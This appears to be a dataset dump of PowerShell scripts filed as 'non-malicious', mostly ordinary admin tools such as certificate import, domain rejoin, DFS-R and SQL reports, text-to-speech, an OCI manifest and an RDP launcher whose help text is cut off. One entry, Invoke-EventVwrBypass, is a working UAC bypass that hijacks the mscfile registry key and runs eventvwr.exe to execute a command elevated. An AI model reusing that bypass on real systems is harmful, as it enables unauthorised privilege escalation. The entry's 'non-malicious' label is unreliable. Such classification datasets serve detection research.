bRmAnskeNhi0wnVaeVogLMdGD+nqMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoy # QUQ0LTRCOTItRkEwMTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAaKBSisy4y86pl8Xy22CJZExE2vOggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOpT9tgwIhgPMjAyNDA3MzEwNzMzNDRaGA8yMDI0MDgwMTA3MzM0NFowdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6lP22AIBADAHAgEAAgIcSzAHAgEAAgIgczAKAgUA # 6lVIWAIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAHOpffy0QyV+0jeXe+3n # gQrsr25fx0Y0FoYyYQ6Db+kP/EWRaOW5yJYVzbMTXmXZZ1B+mpc8tvYCnw5bxWHT # FOs1fw7ErreemwjzGwXJAWQE+4qwbu0sBFY0rSPf6+R3jRpkGevsSFQg5CQDlE6v # KnnnzEBZ4fwZooXtOtMwVaNvMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHenkielp8oRD0AAQAAAd4wDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQgVbgnJdW4gBz7Axs7wGfQo2XZgoXcnvc4oMWE2sVvgA8wgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCCOPiOfDcFeEBBJAn/mC3MgrT5w/U2z81LYD44Hc34d # ezCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB3p5I # npafKEQ9AAEAAAHeMCIEID1OAzK1/Wc/iomxipjPCilJXDo/OKgUaWKoACw0DZsr # MA0GCSqGSIb3DQEBCwUABIICAAa5Z6cIEN4U65tHxml/siojdeeka7acnWiWcPLe # 1N13fVg+hFjCJLTbM2fo9G0NQIcO9YfqzlVtZYM+rw4/q+TsYc/9RNoNEIectq3s # YEOh6j6i42FftJypAhWdVikv6BmyRWaiw7w/kFXqBXTusUCTpmSKy+41NaweHek3 # T8s5JptTx57l7QUCseDzFLGPfn2EiorbKthKbVKtsJf6qqNZNKXA17LGOKywzcxG # 91Neo70Ly67fcS2smS+Q8LND7SU7SpTfFC4ARjIaNZZlrIguNNpedADIvmB7w7XY # xgxBt3EB8Xkyfy2CaT/G4M1wzuzi/xX5Zcq3Gs75WUzQ9gC+DyE1mUe7BqtF8vxl # 15ozD/EAF5pafgRdr60vsuXYmzl046zD99kwaxYxOkwnvoDElKezT8Yi7U3Z9MIT # LksJ4MhojlN3gY5ptkIT7Xgs2sjvkdmiQXkVr7srEwk14L7XaRQj8mPkW/xTHgpX # jaE2XbokF2XD3E4C0l+LvlSg1kCC0wTMo3RllqcBWNQWQsHU0EwoYlpPb+X3GNih # pB2s2mMmx5OhZBVKoBBIcsoUuzWH3xJjo74bYbDFmeZFtcj4KGOLGBZ3bp7MsToi # n5UY3EKTsXAnZxwkFO55Us/teoiZZ0/V8rSXGZrfstQd3mYqznzgSCmFvK0lwEp3 # bnhP # SIG # End signature block
combined_dataset/train/non-malicious/Import-Certificate_5.ps1
Import-Certificate_5.ps1
#requires -Version 2.0 function Import-Certificate { param ( [IO.FileInfo] $CertFile = $(throw "Paramerter -CertFile [System.IO.FileInfo] is required."), [string[]] $StoreNames = $(throw "Paramerter -StoreNames [System.String] is required."), [switch] $LocalMachine, [switch] $CurrentUser, [string] $CertPassword, [switch] $Verbose ) begin { [void][System.Reflection.Assembly]::LoadWithPartialName("System.Security") } process { if ($Verbose) { $VerbosePreference = 'Continue' } if (-not $LocalMachine -and -not $CurrentUser) { Write-Warning "One or both of the following parameters are required: '-LocalMachine' '-CurrentUser'. Skipping certificate '$CertFile'." } try { if ($_) { $certfile = $_ } $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 $certfile,$CertPassword,"Exportable,MachineKeySet,PersistKeySet" } catch { Write-Error ("Error importing '$certfile': $_ .") -ErrorAction:Continue } if ($cert -and $LocalMachine) { $StoreScope = "LocalMachine" $StoreNames | ForEach-Object { $StoreName = $_ if (Test-Path "cert:\\$StoreScope\\$StoreName") { try { $store = New-Object System.Security.Cryptography.X509Certificates.X509Store $StoreName, $StoreScope $store.Open([System.Security.Cryptography.X509Certificates.OpenFlags]::ReadWrite) $store.Add($cert) $store.Close() Write-Verbose "Successfully added '$certfile' to 'cert:\\$StoreScope\\$StoreName'." } catch { Write-Error ("Error adding '$certfile' to 'cert:\\$StoreScope\\$StoreName': $_ .") -ErrorAction:Continue } } else { Write-Warning "Certificate store '$StoreName' does not exist. Skipping..." } } } if ($cert -and $CurrentUser) { $StoreScope = "CurrentUser" $StoreNames | ForEach-Object { $StoreName = $_ if (Test-Path "cert:\\$StoreScope\\$StoreName") { try { $store = New-Object System.Security.Cryptography.X509Certificates.X509Store $StoreName, $StoreScope $store.Open([System.Security.Cryptography.X509Certificates.OpenFlags]::ReadWrite) $store.Add($cert) $store.Close() Write-Verbose "Successfully added '$certfile' to 'cert:\\$StoreScope\\$StoreName'." } catch { Write-Error ("Error adding '$certfile' to 'cert:\\$StoreScope\\$StoreName': $_ .") -ErrorAction:Continue } } else { Write-Warning "Certificate store '$StoreName' does not exist. Skipping..." } } } } end { } }
combined_dataset/train/non-malicious/2365.ps1
2365.ps1
[CmdletBinding()] param ( [Parameter(Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName)] [string[]]$Computername, [Parameter(Mandatory)] [string]$DomainName, [Parameter(Mandatory)] [string]$UnjoinLocalCredentialXmlFilePath, [Parameter(Mandatory)] [string]$DomainCredentialXmlFilePath ) begin { $ErrorActionPreference = [System.Management.Automation.ActionPreference]::Stop function New-Credential { [CmdletBinding()] [OutputType([System.Management.Automation.PSCredential])] param ( [Parameter(Mandatory)] [ValidateScript({ Test-Path -Path $_ -PathType Leaf })] [string]$XmlFilePath ) process { $Cred = Import-Clixml $XmlFilePath New-Object System.Management.Automation.PSCredential($Cred.username, $Cred.password) } } Function Test-Ping ($ComputerName) { $Result = ping $Computername -n 2 if ($Result | where { $_ -match 'Reply from ' }) { $true } else { $false } } function Test-DomainTrust ($Computername) { $Result = netdom verify $Computername /Domain:$DomainName if ($Result -match 'command completed successfully') { $true } else { $false } } function Wait-Reboot ($Computername,$Credential) { while (Test-Ping -ComputerName $Computername) { Write-Verbose "Waiting for $Computername to go offline..." Start-Sleep -Seconds 1 } Write-Verbose "The computer $Computername has went down for a reboot. Waiting for it to come back up..." while (!(Test-Ping -ComputerName $Computername)) { Start-Sleep -Seconds 5 Write-Verbose "Waiting for $Computername to come back online" } Write-Verbose "The computer $Computername has come online. Waiting for OS to initialize" $EapBefore = $ErrorActionPreference $ErrorActionPreference = [System.Management.Automation.ActionPreference]::SilentlyContinue while (!(Get-WmiObject -ComputerName $Computername -Class Win32_OperatingSystem -Credential $Credential)) { Start-Sleep -Seconds 5 Write-Verbose "Waiting for OS to initialize..." } $ErrorActionPreference = $EapBefore } } process { foreach ($Computer in $Computername) { try { if (Test-Ping -ComputerName $Computer) { Write-Verbose "The computer '$Computer' is online" $LocalCredential = (New-Credential -XmlFilePath $UnjoinLocalCredentialXmlFilePath) $DomainCredential = (New-Credential -XmlFilePath $DomainCredentialXmlFilePath) Write-Verbose "Removing computer from domain and forcing restart" Remove-Computer -ComputerName $Computer -LocalCredential $LocalCredential -UnjoinDomainCredential $DomainCredential -Workgroup TempWorkgroup -Restart -Force Write-Verbose "The computer has been removed from domain. Waiting for a reboot." Wait-Reboot -Computername $Computer -Credential $LocalCredential Write-Verbose "The computer $Computer has been rebooted. Attempting to rejoin to domain." Add-Computer -ComputerName $Computer -DomainName $DomainName -Credential $DomainCredential -LocalCredential $LocalCredential -Restart -Force Write-Verbose "The computer $Computer has been rejoined to domain. Waiting for the final reboot" Wait-Reboot -Computername $Computer -Credential $DomainCredential Write-Verbose "The computer $Computer has been successfully rejoined to the domain $DomainName" [pscustomobject]@{ 'Computername' = $Computer; 'Result' = $true } } else { throw "The computer '$Computer' is offline or name cannot be resolved" } } catch { [pscustomobject]@{ 'Computername' = $Computer; 'Result' = $false; 'Error' = $_.Exception.Message } } } }
combined_dataset/train/non-malicious/New-DFSRHealthReport.ps1
New-DFSRHealthReport.ps1
<# NAME: New-DFSRHealthReport.ps1 AUTHOR: Jan Egil Ring EMAIL: jan.egil.ring@powershell.no COMMENT: Script to generate a new DFS-R HTML Health Report for the Domain System Volume (SYSVOL) replication group using the native dfsradmin.exe tool. More information: You have a royalty-free right to use, modify, reproduce, and distribute this script file in any way you find useful, provided that you agree that the creator, owner above has no warranty, obligations, or liability for such use. VERSION HISTORY: 1.0 30.12.2010 - Initial release #> #requires -version 2 #Initial variable $ReportFilePath = "C:\\Reports\\DFS-R\\Health-report-"+(Get-Date -UFormat %Y-%m-%d) $ReferralDC = "domain\\srv-dc-01" $SmtpServer = "srv-smtp-01.domain.local" $EmailFrom = "dfs-r@domain.local" $EmailTo = "user@domain.local" #Run DfsrAdmin.exe to generate report DfsrAdmin.exe Health New /RgName:`"Domain System Volume`" /RefMemName:$ReferralDC /RepName:$ReportFilePath /FsCount:true #Send HTML-report to the specified e-mail address Send-MailMessage -From $EmailFrom -To $EmailTo -SmtpServer $SmtpServer -Subject "DFS-R Health Report 2010-12-30" -Body "The DFS-R Health Report is attched to this e-mail" -Attachments ($ReportFilePath+".html")
combined_dataset/train/non-malicious/4240.ps1
4240.ps1
function Invoke-EventVwrBypass { [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')] Param ( [Parameter(Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $Command, [Switch] $Force ) $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command" if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){ New-Item $mscCommandPath -Force | New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null }else{ Write-Verbose "Key already exists, consider using -Force" exit } if (Test-Path $mscCommandPath) { Write-Verbose "Created registry entries to hijack the msc extension" }else{ Write-Warning "Failed to create registry key, exiting" exit } $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe' if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) { $Process = Start-Process -FilePath $EventvwrPath -PassThru Write-Verbose "Started eventvwr.exe" } Write-Verbose "Sleeping 5 seconds to trigger payload" if (-not $PSBoundParameters['WhatIf']) { Start-Sleep -Seconds 5 } $mscfilePath = "HKCU:\Software\Classes\mscfile" if (Test-Path $mscfilePath) { Remove-Item $mscfilePath -Recurse -Force Write-Verbose "Removed registry entries" } if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){ Stop-Process -Id $Process.Id Write-Verbose "Killed running eventvwr process" } }
combined_dataset/train/non-malicious/2537.ps1
2537.ps1
$server = "XSQLUTIL18" $database = "master" $query = " SELECT [sys].[tables].[name] , [sys].[tables].[create_date] , [sys].[tables].[modify_date] FROM sys.tables SELECT [sys].[columns].[name] , [sys].[columns].[max_length] , [sys].[columns].[precision] , [sys].[columns].[scale] FROM sys.columns SELECT [sys].[indexes].[name] , [sys].[indexes].[type_desc] FROM sys.indexes SELECT [sys].[databases].[name] , [sys].[databases].[create_date] , [sys].[databases].[compatibility_level] , [sys].[databases].[collation_name] FROM sys.databases SELECT [sys].[database_files].[file_id] , [sys].[database_files].[file_guid] , [sys].[database_files].[type] , [sys].[database_files].[type_desc] , [sys].[database_files].[data_space_id] , [sys].[database_files].[name] , [sys].[database_files].[physical_name] , [sys].[database_files].[state] , [sys].[database_files].[state_desc] , [sys].[database_files].[size] , [sys].[database_files].[max_size] , [sys].[database_files].[growth] FROM sys.database_files " $connectionTemplate = "Data Source={0};Integrated Security=SSPI;Initial Catalog={1};" $connectionString = [string]::Format($connectionTemplate, $server, $database) $connection = New-Object System.Data.SqlClient.SqlConnection $connection.ConnectionString = $connectionString $command = New-Object System.Data.SqlClient.SqlCommand $command.CommandText = $query $command.Connection = $connection $SqlAdapter = New-Object System.Data.SqlClient.SqlDataAdapter $SqlAdapter.SelectCommand = $command $DataSet = New-Object System.Data.DataSet $SqlAdapter.Fill($DataSet) $connection.Close() $excel = new-object -comobject excel.application $excel.visible = $false $workbook = $excel.workbooks.add() for($i=4; $i -ge 0; $i--) { switch ($i) { "0" { $extractFile = "E:\Dexma\AHMSIReports\Tables.csv"; $TabName = "Tables"; $Columns = "C";} "1" { $extractFile = "E:\Dexma\AHMSIReports\Columns.csv"; $TabName = "Columns"; $Columns = "C";} "2" { $extractFile = "E:\Dexma\AHMSIReports\Indexes.csv"; $TabName = "Indexes"; $Columns = "B";} "3" { $extractFile = "E:\Dexma\AHMSIReports\Databases.csv"; $TabName = "Databases"; $Columns = "D";} "4" { $extractFile = "E:\Dexma\AHMSIReports\DatabaseFiles.csv"; $TabName = "DatabaseFiles"; $Columns = "L";} } $csvResults = $DataSet.Tables[$i] | ConvertTo-CSV -Delimiter "`t" -NoTypeInformation $csvResults | Out-Clipboard $Worksheet = $Workbook.Sheets.Add() $Worksheet.Name = $TabName $Range = $Worksheet.Range("a1","$Columns$($csvResults.count)") $Worksheet.Paste($Range, $false) $Range.EntireColumn.Autofit() } $Excel.DisplayAlerts = $false $Workbook.Worksheets.Item("Sheet1").Delete() $Workbook.Worksheets.Item("Sheet2").Delete() $Workbook.Worksheets.Item("Sheet3").Delete() $Workbook.SaveAs("E:\Dexma\AHMSIReports\AHMSIReport.xlsx")
combined_dataset/train/non-malicious/Out-Voice 2.0.ps1
Out-Voice 2.0.ps1
# --------------------------------------------------------------------------- ## <Script> ## <Author> ## Joel "Jaykul" Bennett ## </Author> ## <Description> ## Outputs text as spoken words ## </Description> ## <Usage> ## Out-Speech "Hello World" ## </Usage> ## <Version>2.0</Version> ## </Script> # --------------------------------------------------------------------------- param([string]$wavFile, [switch]$wait, [switch]$purge, [switch]$passthru, [string[]]$inputObject) begin { if ($args -eq '-?') { '' 'Usage: Out-Speech [[-Collection] <array>]' '' 'Parameters:' ' -Collection : A collection of items to speak.' ' -? : Display this usage information' ' Switches:' ' -wavFile : Path to a wav file to write output' ' -wait : Wait for the machine to read each item (NOT asynchronous).' ' -purge : Purge all other speech requests before making this call.' ' -passthru : Pass on the input as output.' '' 'Examples:' ' PS> Out-Speech "Hello World"' ' PS> Select-RandomLine quotes.txt | Out-Speech -wait' ' PS> Get-Content "Hitchhiker''s Guide To The Galaxy.txt" | Out-Speech -wav "Hitchiker.wav"' '' exit } if ($inputObject) { Write-Output $inputObject | &($MyInvocation.InvocationName) $wavFile -wait:$wait -purge:$purge -passthru:$passthru break; } else { [Reflection.Assembly]::LoadWithPartialName("System.Speech") | out-null $speaker = new System.Speech.Synthesis.SpeechSynthesizer if( $purge ) { $speaker.SpeakAsyncCancelAll() } if( ![string]::IsNullOrEmpty( $wavFile ) ){ # this is just for your convenience, because you should wait before trying to use the file. if(!$wait.IsPresent){$wait =$true} $speaker.SetOutputToWaveFile( $(if( Split-Path $wavFile ) { $wavFile } else { "$pwd\\$wavFile" }) ) } } } process { if ($_) { if($wait) { $speaker.Speak( ($_ | out-string) ) } else { $speaker.SpeakAsync( ($_ | out-string) ) } if($passthru) { $_ } } } end { if( ![string]::IsNullOrEmpty( $wavFile ) ){ $speaker.SetOutputToDefaultAudioDevice() } $speaker.Dispose() }
combined_dataset/train/non-malicious/sample_61_65.ps1
sample_61_65.ps1
# # Module manifest for module 'OCI.PSModules.Filestorage' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Filestorage.dll' # Version number of this module. ModuleVersion = '89.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '85a998bb-f613-464a-af19-f5aaed2d127b' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Filestorage Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '89.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Filestorage.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Confirm-OCIFilestorageKeyTabs', 'DisMount-OCIFilestorageClone', 'Get-OCIFilestorageExport', 'Get-OCIFilestorageExportSet', 'Get-OCIFilestorageExportSetsList', 'Get-OCIFilestorageExportsList', 'Get-OCIFilestorageFileSystem', 'Get-OCIFilestorageFileSystemsList', 'Get-OCIFilestorageFilesystemSnapshotPoliciesList', 'Get-OCIFilestorageFilesystemSnapshotPolicy', 'Get-OCIFilestorageMountTarget', 'Get-OCIFilestorageMountTargetsList', 'Get-OCIFilestorageOutboundConnector', 'Get-OCIFilestorageOutboundConnectorsList', 'Get-OCIFilestorageReplication', 'Get-OCIFilestorageReplicationsList', 'Get-OCIFilestorageReplicationTarget', 'Get-OCIFilestorageReplicationTargetsList', 'Get-OCIFilestorageSnapshot', 'Get-OCIFilestorageSnapshotsList', 'Invoke-OCIFilestorageEstimateReplication', 'Invoke-OCIFilestoragePauseFilesystemSnapshotPolicy', 'Invoke-OCIFilestorageUnpauseFilesystemSnapshotPolicy', 'Move-OCIFilestorageFileSystemCompartment', 'Move-OCIFilestorageFilesystemSnapshotPolicyCompartment', 'Move-OCIFilestorageMountTargetCompartment', 'Move-OCIFilestorageOutboundConnectorCompartment', 'Move-OCIFilestorageReplicationCompartment', 'New-OCIFilestorageExport', 'New-OCIFilestorageFileSystem', 'New-OCIFilestorageFilesystemSnapshotPolicy', 'New-OCIFilestorageMountTarget', 'New-OCIFilestorageOutboundConnector', 'New-OCIFilestorageReplication', 'New-OCIFilestorageSnapshot', 'Remove-OCIFilestorageExport', 'Remove-OCIFilestorageFileSystem', 'Remove-OCIFilestorageFilesystemSnapshotPolicy', 'Remove-OCIFilestorageMountTarget', 'Remove-OCIFilestorageOutboundConnector', 'Remove-OCIFilestorageReplication', 'Remove-OCIFilestorageReplicationTarget', 'Remove-OCIFilestorageSnapshot', 'Update-OCIFilestorageExport', 'Update-OCIFilestorageExportSet', 'Update-OCIFilestorageFileSystem', 'Update-OCIFilestorageFilesystemSnapshotPolicy', 'Update-OCIFilestorageMountTarget', 'Update-OCIFilestorageOutboundConnector', 'Update-OCIFilestorageReplication', 'Update-OCIFilestorageSnapshot' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Filestorage' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/INICIAR-RDP.ps1
INICIAR-RDP.ps1
######################################################################################################################## # NAME # Start-RDP # # SYNOPSIS # Opens a remote desktop connection to another computer. # # SYNTAX # Start-RDP [[-Server] <string>] [[-Width] <int>] [[-Height] <int>] # Start-RDP -Path <string> [[-Width] <int>] [[-Height] <int>] # # DETAILED DESCRIPTION # The Start-RDP cmdlet opens a new Remote Desktop connection using the Microsoft Terminal Services Client. # Connection settings can be specified by argument or read from a standard RDP file. # # PARAMETERS # -Server <string> # Specifies the name of the server to connect to. May also include an IP address, domain, and/or port. # # Required? false # Position? 1 # Default value # Accept pipeline input? true # Accept wildcard characters? false # # -Width <int> # Specifies the desired width of the resolution for the connection (for non-full screen connections). # # Required? false # Position? 2 # Default value # Accept pipeline input? false # Accept wildcard characters? false # # -Height <int> # Specifies the desired height of the resolution for the connection (for non-full screen connections). # # Required? false # Position? 3 # Default value # Accept pipeline input? false # Accept wildcard characters? false # # -Path <string> # Specifies the path to an RDP file to connect with (resolution settings can be overridden using the # -Width and -Height parameters. # # Required? false # Position? 4 # Default value # Accept pipeline input? true # Accept wildcard characters? false # # -Console <SwitchParameter> # Connect to a Windows Server 2003 console session. # # Required? false # Position? named # Default value false # Accept pipeline input? false # Accept wildcard characters? false # # -Admin <SwitchParameter> # Connect to a Windows Server 2008 administrator session. # # Required? false # Position? named # Default value false # Accept pipeline input? false # Accept wildcard characters? false # # -Fullscreen <SwitchParameter> # Open connection in full screen mode. # # Required? false # Position? named # Default value false # Accept pipeline input? false # Accept wildcard characters? false # # -Public <SwitchParameter> # Run Remote Desktop in public mode. # # Required? false # Position? named # Default value false # Accept pipeline input? false # Accept wildcard characters? false # # -Span <SwitchParameter> # Span the Remote Desktop connection across multiple monitors. Each monitor must have the same height # and be arranged vertically. # # Required? false # Position? named # Default value false # Accept pipeline input? false # Accept wildcard characters? false # # INPUT TYPE # String,System.IO.FileInfo # # RETURN TYPE # # # NOTES # # -------------------------- EXAMPLE 1 -------------------------- # # C:\\PS>Start-RDP # # # This command opens the Terminal Services Client connection dialog to specify a connection. # # # -------------------------- EXAMPLE 2 -------------------------- # # C:\\PS>Start-RDP -Server myserver -Width 1024 